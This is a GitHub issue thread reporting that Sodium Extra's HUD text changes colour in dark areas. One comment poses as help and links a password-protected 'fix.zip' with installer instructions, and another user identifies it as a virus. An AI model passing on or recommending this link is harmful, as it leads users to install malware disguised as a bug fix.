### ISSUE TITLE
Color of hud text changes when in darker areas

### ISSUE THREAD

**Issue by UninenVille** [FlashyReese/sodium-extra-fabric#407]
### Make sure you are not opening a duplicate.

- [X] [I have searched the issue tracker](https://github.com/FlashyReese/sodium-extra-fabric/issues?q=) and did not find an issue describing my bug.

### Minecraft version.

1.21.1

### Sodium Extra version.

mc1.21.1-0.6.0-beta.1+fabric

### Sodium version.

mc1.21-0.6.0-beta.1-fabric

### What happened?

Hud text changes color when in darker areas, here is screenshot of that happening:
![image](https://github.com/user-attachments/assets/2cd45301-a264-4e69-9e0a-d490cbfe9f4b)
This didn't happen before and I didn't notice any mention of this in changelog so feels like this is bug, correct me if I'm wrong 😅

### Relevant log.

No relevant log

### Additional information.

No other mods installed

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by youzi-2333** [comment]
Please don't download this file! This is a computer virus.

**Comment by UninenVille** [comment]
Duplicate of #426
